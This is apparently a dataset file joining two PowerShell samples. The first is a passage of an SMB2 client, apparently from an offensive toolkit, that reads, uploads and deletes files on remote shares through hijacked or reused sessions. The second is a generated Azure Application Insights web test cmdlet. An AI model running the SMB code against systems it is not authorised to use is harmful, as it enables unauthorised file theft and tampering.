$directory_object $i++ } if($directory_contents_output -and !$Modify) { if($directory_contents_hide_headers) { ($directory_contents_output | Format-Table -Property @{ Name="Mode"; Expression={$_.Mode }; Alignment="left"; }, @{ Name="LastWriteTime"; Expression={$_.LastWriteTime }; Alignment="right"; }, @{ Name="Length"; Expression={$_.Length }; Alignment="right"; }, @{ Name="Name"; Expression={$_.Name }; Alignment="left"; } -AutoSize -HideTableHeaders -Wrap| Out-String).Trim() } else { $directory_contents_hide_headers = $true ($directory_contents_output | Format-Table -Property @{ Name="Mode"; Expression={$_.Mode }; Alignment="left"; }, @{ Name="LastWriteTime"; Expression={$_.LastWriteTime }; Alignment="right"; }, @{ Name="Length"; Expression={$_.Length }; Alignment="right"; }, @{ Name="Name"; Expression={$_.Name }; Alignment="left"; } -AutoSize -Wrap| Out-String).Trim() } } else { $directory_contents_output } $subdirectory_list.Reverse() > $null ForEach($subdirectory in $subdirectory_list) { $directory_list.Insert(0,($root_directory + $subdirectory)) > $null } $SMB_offset = 0 $stage = 'CloseRequest' } 'QueryInfoRequest' { $message_ID++ $packet_SMB2_header = New-PacketSMB2Header 0x10,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID $packet_SMB2_header["NextCommand"] = $header_next_command $packet_SMB2_data = New-PacketSMB2QueryInfoRequest $query_info_request_info_type_1 $query_info_request_file_info_class_1 $query_info_request_output_buffer_length_1 $query_info_request_input_buffer_offset_1 $file_ID $query_info_request_buffer_1 $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data if($SMB_signing) { $SMB2_sign = $SMB2_header + $SMB2_data $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) $SMB2_signature = $SMB2_signature[0..15] $packet_SMB2_header["Signature"] = $SMB2_signature $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header } $message_ID++ $packet_SMB2b_header = New-PacketSMB2Header 0x10,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID if($SMB_signing) { $packet_SMB2b_header["Flags"] = 0x0c,0x00,0x00,0x00 } else { $packet_SMB2b_header["Flags"] = 0x04,0x00,0x00,0x00 } $packet_SMB2b_data = New-PacketSMB2QueryInfoRequest $query_info_request_info_type_2 $query_info_request_file_info_class_2 $query_info_request_output_buffer_length_2 $query_info_request_input_buffer_offset_2 $file_ID $query_info_request_buffer_2 $SMB2b_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_header $SMB2b_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_data $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService ($SMB2_header.Length + $SMB2b_header.Length) ($SMB2_data.Length + $SMB2b_data.Length) $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service if($SMB_signing) { $SMB2_sign = $SMB2b_header + $SMB2b_data $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) $SMB2_signature = $SMB2_signature[0..15] $packet_SMB2b_header["Signature"] = $SMB2_signature $SMB2b_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_header } $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $SMB2b_header + $SMB2b_data $client_stream.Write($client_send,0,$client_send.Length) > $null $client_stream.Flush() $client_stream.Read($client_receive,0,$client_receive.Length) > $null if($share_subdirectory_start) { $file = [System.Text.Encoding]::Unicode.GetBytes($share_subdirectory) $root_directory = $file + 0x5c,0x00 $create_request_extra_info = 1 $stage = 'CreateRequest' } elseif($Action -eq 'Get') { switch($action_step) { 5 { $query_info_response = [System.BitConverter]::ToString($client_receive) $query_info_response = $query_info_response -replace "-","" $file_stream_size_index = $query_info_response.Substring(10).IndexOf("FE534D42") + 170 $file_stream_size = [System.BitConverter]::ToUInt32($client_receive[($file_stream_size_index / 2)..($file_stream_size_index / 2 + 8)],0) $file_stream_size_quotient = [Math]::Truncate($file_stream_size / 65536) $file_stream_size_remainder = $file_stream_size % 65536 $percent_complete = $file_stream_size_quotient if($file_stream_size_remainder -ne 0) { $percent_complete++ } if($file_stream_size -lt 1024) { $progress_file_size = "" + $file_stream_size + "B" } elseif($file_stream_size -lt 1024000) { $progress_file_size = "" + ($file_stream_size / 1024).ToString('.00') + "KB" } else { $progress_file_size = "" + ($file_stream_size / 1024000).ToString('.00') + "MB" } $header_next_command = 0x70,0x00,0x00,0x00 $query_info_request_info_type_1 = 0x02 $query_info_request_file_info_class_1 = 0x01 $query_info_request_output_buffer_length_1 = 0x58,0x00,0x00,0x00 $query_info_request_input_buffer_offset_1 = 0x00,0x00 $query_info_request_buffer_1 = 8 $query_info_request_info_type_2 = 0x02 $query_info_request_file_info_class_2 = 0x05 $query_info_request_output_buffer_length_2 = 0x50,0x00,0x00,0x00 $query_info_request_input_buffer_offset_2 = 0x00,0x00 $query_info_request_buffer_2 = 1 $action_step++ $stage = 'QueryInfoRequest' } 6 { if($file_stream_size -lt 65536) { $read_request_length = $file_stream_size } else { $read_request_length = 65536 } $read_request_offset = 0 $read_request_step = 1 $action_step++ $stage = 'ReadRequest' } } } elseif($Action -eq 'Put') { $percent_complete = $source_file_size_quotient if($source_file_size_remainder -ne 0) { $percent_complete++ } if($source_file_size -lt 1024) { $progress_file_size = "" + $source_file_size + "B" } elseif($source_file_size -lt 1024000) { $progress_file_size = "" + ($source_file_size / 1024).ToString('.00') + "KB" } else { $progress_file_size = "" + ($source_file_size / 1024000).ToString('.00') + "MB" } $action_step++ $set_info_request_file_info_class = 0x01 $set_info_request_info_level = 0x14 $set_info_request_buffer = [System.BitConverter]::GetBytes($source_file_size) $stage = 'SetInfoRequest' } elseif($Action -eq 'Delete') { $stage = 'CreateRequest' } else { $stage = 'CreateRequestFindRequest' } } 'ReadRequest' { $message_ID++ $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID $packet_SMB2_data = New-PacketSMB2ReadRequest $read_request_length $read_request_offset $file_ID $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service if($SMB_signing) { $SMB2_sign = $SMB2_header + $SMB2_data $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) $SMB2_signature = $SMB2_signature[0..15] $packet_SMB2_header["Signature"] = $SMB2_signature $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header } $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data $client_stream.Write($client_send,0,$client_send.Length) > $null $client_stream.Flush() Start-Sleep -m 5 if($read_request_length -eq 65536) { $i = 0 while($client.Available -lt 8192 -and $i -lt 10) { Start-Sleep -m $Sleep $i++ } } else { Start-Sleep -m $Sleep } $client_stream.Read($client_receive,0,$client_receive.Length) > $null if($Action -eq 'Get' -and $action_step -eq 3) { $action_step++ $create_request_extra_info = 1 $stage = 'CreateRequest' } elseif($Action -eq 'Get' -and $action_step -eq 7) { if(!$NoProgress) { $percent_complete_calculation = [Math]::Truncate($read_request_step / $percent_complete * 100) Write-Progress -Activity "Downloading $source_file - $progress_file_size" -Status "$percent_complete_calculation% Complete:" -PercentComplete $percent_complete_calculation } $file_bytes = $client_receive[84..($read_request_length + 83)] if(!$Modify) { if(!$file_write) { $file_write = New-Object 'System.IO.FileStream' $destination_path,'Append','Write','Read' } $file_write.Write($file_bytes,0,$file_bytes.Count) } else { $file_memory.AddRange($file_bytes) } if($read_request_step -lt $file_stream_size_quotient) { $read_request_offset+=65536 $read_request_step++ $stage = 'ReadRequest' } elseif($read_request_step -eq $file_stream_size_quotient -and $file_stream_size_remainder -ne 0) { $read_request_length = $file_stream_size_remainder $read_request_offset+=65536 $read_request_step++ $stage = 'ReadRequest' } else { if(!$Modify) { $file_write.Close() } else { [Byte[]]$file_memory = $file_memory ,$file_memory } $output_message = "[+] File downloaded" $stage = 'CloseRequest' } } elseif([System.BitConverter]::ToString($client_receive[12..15]) -ne '03-01-00-00') { $stage = 'CloseRequest' } else { $stage = 'CloseRequest' } } 'SetInfoRequest' { $message_ID++ $packet_SMB2_header = New-PacketSMB2Header 0x11,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID $packet_SMB2_data = New-PacketSMB2SetInfoRequest $set_info_request_file_info_class $set_info_request_info_level $file_ID $set_info_request_buffer $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service if($SMB_signing) { $SMB2_sign = $SMB2_header + $SMB2_data $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) $SMB2_signature = $SMB2_signature[0..15] $packet_SMB2_header["Signature"] = $SMB2_signature $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header } $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data $client_stream.Write($client_send,0,$client_send.Length) > $null $client_stream.Flush() $client_stream.Read($client_receive,0,$client_receive.Length) > $null if($source_file_size -le 65536) { $write_request_length = $source_file_size } else { $write_request_length = 65536 } $write_request_offset = 0 $write_request_step = 1 if($Action -eq 'Delete') { $output_message = "[+] File deleted" $stage = 'CloseRequest' $action_step++ } elseif($Action -eq 'Put' -and $action_step -eq 4) { $output_message = "[+] File uploaded" $stage = 'CloseRequest' } else { $stage = 'WriteRequest' } } 'TreeConnect' { $message_ID++ $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x1f,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID $packet_SMB2_data = New-PacketSMB2TreeConnectRequest $path_bytes $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service if($SMB_signing) { $SMB2_sign = $SMB2_header + $SMB2_data $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) $SMB2_signature = $SMB2_signature[0..15] $packet_SMB2_header["Signature"] = $SMB2_signature $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header } $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data try { $client_stream.Write($client_send,0,$client_send.Length) > $null $client_stream.Flush() $client_stream.Read($client_receive,0,$client_receive.Length) > $null } catch { Write-Output "[-] Session connection is closed" $stage = 'Exit' } if($stage -ne 'Exit') { if([System.BitConverter]::ToString($client_receive[12..15]) -ne '00-00-00-00') { $error_code = [System.BitConverter]::ToString($client_receive[12..15]) switch($error_code) { 'cc-00-00-c0' { $output_message = "[-] Share not found" $stage = 'Exit' } '22-00-00-c0' { $output_message = "[-] Access denied" $stage = 'Exit' } default { $error_code = $error_code -replace "-","" $output_message = "[-] Tree connect error code 0x$error_code" $stage = 'Exit' } } } elseif($refresh) { Write-Output "[+] Session refreshed" $stage = 'Exit' } elseif(!$SMB_IPC) { $SMB_share_path = "\\" + $Target + "\" + $Share $path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_share_path) $SMB_IPC = $true $stage = 'IoctlRequest' $file = "" } else { if($Action -eq 'Put') { $file = [System.Text.Encoding]::Unicode.GetBytes($share_subdirectory) $create_request_extra_info = 2 } else { $create_request_extra_info = 1 } $tree_ID = $client_receive[40..43] $stage = 'CreateRequest' if($Action -eq 'Get') { $file = [System.Text.Encoding]::Unicode.GetBytes($share_subdirectory) } } } } 'TreeDisconnect' { $message_ID++ $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID $packet_SMB2_data = New-PacketSMB2TreeDisconnectRequest $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service if($SMB_signing) { $SMB2_sign = $SMB2_header + $SMB2_data $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) $SMB2_signature = $SMB2_signature[0..15] $packet_SMB2_header["Signature"] = $SMB2_signature $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header } $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data $client_stream.Write($client_send,0,$client_send.Length) > $null $client_stream.Flush() $client_stream.Read($client_receive,0,$client_receive.Length) > $null if($inveigh_session -and !$Logoff) { $stage = 'Exit' } else { $stage = 'Logoff' } } 'WriteRequest' { if(!$Modify) { $source_file_binary_reader.BaseStream.Seek($write_request_offset,"Begin") > $null $source_file_binary_reader.Read($source_file_buffer,0,$source_file_buffer_size) > $null } else { $source_file_buffer = $Source[$write_request_offset..($write_request_offset+$write_request_length)] } $message_ID++ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID $packet_SMB2_header["CreditCharge"] = 0x01,0x00 $packet_SMB2_data = New-PacketSMB2WriteRequest $write_request_length $write_request_offset $file_ID $source_file_buffer $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service if($SMB_signing) { $SMB2_sign = $SMB2_header + $SMB2_data $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign) $SMB2_signature = $SMB2_signature[0..15] $packet_SMB2_header["Signature"] = $SMB2_signature $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header } $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data $client_stream.Write($client_send,0,$client_send.Length) > $null $client_stream.Flush() $client_stream.Read($client_receive,0,$client_receive.Length) > $null if($write_request_step -lt $source_file_size_quotient) { if(!$NoProgress) { $percent_complete_calculation = [Math]::Truncate($write_request_step / $percent_complete * 100) Write-Progress -Activity "[*] Uploading $source_file - $progress_file_size" -Status "$percent_complete_calculation% Complete:" -PercentComplete $percent_complete_calculation } $write_request_offset+=65536 $write_request_step++ $stage = 'WriteRequest' } elseif($write_request_step -eq $source_file_size_quotient -and $source_file_size_remainder -ne 0) { $write_request_length = $source_file_size_remainder $write_request_offset+=65536 $write_request_step++ $stage = 'WriteRequest' } else { $action_step++ $set_info_request_file_info_class = 0x01 $set_info_request_info_level = 0x04 $set_info_request_buffer = $source_file_creation_time + $source_file_last_access_time + $source_file_last_write_time + $source_file_last_change_time + 0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00 if(!$Modify) { $stage = 'SetInfoRequest' } else { $output_message = "[+] File uploaded from memory" $stage = 'CloseRequest' } } } } } } } catch { Write-Output "[-] $($_.Exception.Message)" } finally { if($file_write.Handle) { $file_write.Close() } if($source_file_stream.Handle) { $source_file_binary_reader.Close() $source_file_stream.Close() } if($inveigh_session -and $Inveigh) { $inveigh.session_lock_table[$session] = 'open' $inveigh.session_message_ID_table[$session] = $message_ID $inveigh.session_list[$session] | Where-Object {$_."Last Activity" = Get-Date -format s} } if(!$inveigh_session -or $Logoff) { $client.Close() $client_stream.Close() } } } if(!$Modify -or $Action -eq 'Put') { Write-Output $output_message } elseif($output_message) { Write-Verbose $output_message } }
combined_dataset/train/non-malicious/sample_14_41.ps1
sample_14_41.ps1
# ---------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Code generated by Microsoft (R) AutoRest Code Generator.Changes may cause incorrect behavior and will be lost if the code # is regenerated. # ---------------------------------------------------------------------------------- <# .Synopsis Creates or updates an Application Insights web test definition. .Description Creates or updates an Application Insights web test definition. .Example PS C:\> {{ Add code here }} {{ Add output here }} .Example PS C:\> {{ Add code here }} {{ Add output here }} .Outputs Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Models.Api20220615.IWebTest .Notes COMPLEX PARAMETER PROPERTIES To create the parameters described below, construct a hash table containing the appropriate properties. For information on hash tables, run Get-Help about_Hash_Tables. GEOLOCATION <IWebTestGeolocation[]>: A list of where to physically run the tests from to give global coverage for accessibility of your application. [Location <String>]: Location ID for the WebTest to run from. REQUESTHEADER <IHeaderField[]>: List of headers and their values to add to the WebTest call. [Name <String>]: The name of the header. [Value <String>]: The value of the header. .Link https://learn.microsoft.com/powershell/module/az.applicationinsights/new-azapplicationinsightswebtest #> function New-AzApplicationInsightsWebTest { [OutputType([Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Models.Api20220615.IWebTest])] [CmdletBinding(DefaultParameterSetName='CreateStandard', PositionalBinding=$false, SupportsShouldProcess, ConfirmImpact='Medium')] param( [Parameter(Mandatory)] [Alias('WebTestName')] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Path')] [System.String] # The name of the Application Insights WebTest resource. ${Name}, [Parameter(Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Path')] [System.String] # The name of the resource group. # The name is case insensitive. ${ResourceGroupName}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Path')] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Runtime.DefaultInfo(Script='(Get-AzContext).Subscription.Id')] [System.String] # The ID of the target subscription. ${SubscriptionId}, [Parameter(Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Body')] [System.String] # Resource location ${Location}, [Parameter(ParameterSetName = "CreateClassic")] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Body')] [System.String] # The XML specification of a WebTest to run against an application. ${Configuration}, [Parameter(ParameterSetName = "CreateStandard")] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Body')] [System.Management.Automation.SwitchParameter] # When set, this value makes the ContentMatch validation case insensitive. ${ContentIgnoreCase}, [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Body')] [System.String] # Content to look for in the return of the WebTest. # Must not be null or empty. ${ContentMatch}, [Parameter(ParameterSetName = "CreateStandard")] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Body')] [System.Management.Automation.SwitchParameter] # When true, validation will pass if there is a match for the ContentMatch string. # If false, validation will fail if there is a match ${ContentPassIfTextFound}, [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Body')] [System.String] # User defined description for this WebTest. ${Description}, [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Body')] [System.Management.Automation.SwitchParameter] # Is the test actively being monitored. ${Enabled}, [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Body')] [System.Int32] # Interval in seconds between test runs for this WebTest. # Default value is 300. ${Frequency}, [AllowEmptyCollection()] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Body')] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Models.Api20220615.IWebTestGeolocation[]] # A list of where to physically run the tests from to give global coverage for accessibility of your application. # To construct, see NOTES section for GEOLOCATION properties and create a hash table. ${GeoLocation}, [ArgumentCompleter([Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Support.WebTestKindEnum])] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Body')] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Support.WebTestKindEnum] # The kind of web test this is, valid choices are ping, multistep, and standard. ${Kind}, [Parameter(ParameterSetName = "CreateStandard")] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Body')] [System.String] # Base64 encoded string body to send with this web test. ${RequestBody}, [Parameter(ParameterSetName = "CreateStandard")] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Body')] [System.Management.Automation.SwitchParameter] # Follow redirects for this web test. ${RequestFollowRedirect}, [Parameter(ParameterSetName = "CreateStandard")] [AllowEmptyCollection()] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Body')] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Models.Api20220615.IHeaderField[]] # List of headers and their values to add to the WebTest call. # To construct, see NOTES section for REQUESTHEADER properties and create a hash table. ${RequestHeader}, [Parameter(ParameterSetName = "CreateStandard")] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Body')] [System.String] # Http verb to use for this web test. ${RequestHttpVerb}, [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Body')] [System.Management.Automation.SwitchParameter] # Parse Dependent request for this WebTest. ${RequestParseDependent}, [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Body')] [System.String] # Url location to test. ${RequestUrl}, [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Body')] [System.Management.Automation.SwitchParameter] # Allow for retries should this WebTest fail. ${RetryEnabled}, [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Body')] [System.Int32] # Validate that the WebTest returns the http status code provided. ${RuleExpectedHttpStatusCode}, [Parameter(ParameterSetName = "CreateStandard")] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Body')] [System.Management.Automation.SwitchParameter] # When set, validation will ignore the status code. ${RuleIgnoreHttpsStatusCode}, [Parameter(ParameterSetName = "CreateStandard")] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Body')] [System.Int32] # A number of days to check still remain before the the existing SSL cert expires. # Value must be positive and the SSLCheck must be set to true. ${RuleSslCertRemainingLifetimeCheck}, [Parameter(ParameterSetName = "CreateStandard")] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Body')] [System.Management.Automation.SwitchParameter] # Checks to see if the SSL cert is still valid. ${RuleSslCheck}, [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Body')] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Runtime.Info(PossibleTypes=([Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Models.Api20220615.IWebtestsResourceTags]))] [System.Collections.Hashtable] # Resource tags ${Tag}, [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Body')] [System.String] # User defined name if this WebTest. ${TestName}, [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Body')] [System.Int32] # Seconds until this WebTest will timeout and fail. # Default value is 30. ${Timeout}, [Parameter()] [Alias('AzureRMContext', 'AzureCredential')] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Azure')] [System.Management.Automation.PSObject] # The credentials, account, tenant, and subscription used for communication with Azure. ${DefaultProfile}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Wait for .NET debugger to attach ${Break}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be appended to the front of the pipeline ${HttpPipelineAppend}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be prepended to the front of the pipeline ${HttpPipelinePrepend}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Runtime')] [System.Uri] # The URI for the proxy server to use ${Proxy}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Runtime')] [System.Management.Automation.PSCredential] # Credentials for a proxy server to use for the remote call ${ProxyCredential}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.ApplicationInsights.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Use the default credentials for the proxy ${ProxyUseDefaultCredentials} ) process { try { if ($PSBoundParameters['Kind'] -eq 'ping') { if (!$PSBoundParameters.ContainsKey("Configuration")) { $guid01 = (New-Guid).ToString() $guid02 = (New-Guid).ToString() if ($PSBoundParameters.ContainsKey('ContentMatch')) { $pingConfigurationRules = "<ValidationRules> <ValidationRule Classname=`"Microsoft.VisualStudio.TestTools.WebTesting.Rules.ValidationRuleFindText, Microsoft.VisualStudio.QualityTools.WebTestFramework, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a`" DisplayName=`"Find Text`" Description=`"Verifies the existence of the specified text in the response.`" Level=`"High`" ExectuionOrder=`"BeforeDependents`"> <RuleParameters> <RuleParameter Name=`"FindText`" Value=`"$($PSBoundParameters['ContentMatch'])`" /> <RuleParameter Name=`"IgnoreCase`" Value=`"False`" /> <RuleParameter Name=`"UseRegularExpression`" Value=`"False`" /> <RuleParameter Name=`"PassIfTextFound`" Value=`"True`" /> </RuleParameters> </ValidationRule> </ValidationRules>" }else { $pingConfigurationRules = $null } $pingConfigurationTemplate = "<WebTest Name=`"$($PSBoundParameters['TestName'])`" Id=`"$($guid01)`" Enabled=`"True`" CssProjectStructure=`"`" CssIteration=`"`" Timeout=`"$($PSBoundParameters['Timeout'])`" WorkItemIds=`"`" xmlns=`"http://microsoft.com/schemas/VisualStudio/TeamTest/2010`" Description=`"`" CredentialUserName=`"`" CredentialPassword=`"`" PreAuthenticate=`"True`" Proxy=`"default`" StopOnError=`"False`" RecordedResultFile=`"`" ResultsLocale=`"`"> <Items> <Request Method=`"Get`" Guid=`"$($guid02)`" Version=`"1.1`" Url=`"$($PSBoundParameters['RequestUrl'])`" ThinkTime=`"0`" Timeout=`"$($PSBoundParameters['Timeout'])`" ParseDependentRequests=`"$($PSBoundParameters['RequestParseDependent'])`" FollowRedirects=`"True`" RecordResult=`"True`" Cache=`"False`" ResponseTimeGoal=`"0`" Encoding=`"utf-8`" ExpectedHttpStatusCode=`"$($PSBoundParameters['RuleExpectedHttpStatusCode'])`" ExpectedResponseUrl=`"`" ReportingName=`"`" IgnoreHttpStatusCode=`"False`" /> </Items> $($pingConfigurationRules) </WebTest>" $PSBoundParameters["Configuration"] = $pingConfigurationTemplate } $null = $PSBoundParameters.Remove("ContentMatch"); $null = $PSBoundParameters.Remove("RequestUrl"); $null = $PSBoundParameters.Remove("RequestParseDependent"); $null = $PSBoundParameters.Remove("RuleExpectedHttpStatusCode"); } Az.ApplicationInsights.internal\New-AzApplicationInsightsWebTest @PSBoundParameters } catch { throw } } } # SIG # Begin signature block # MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCA60JaFcZeQUQdA # DMKJ+dUHZkA9ZU60fITxQUaXiJXuMqCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # 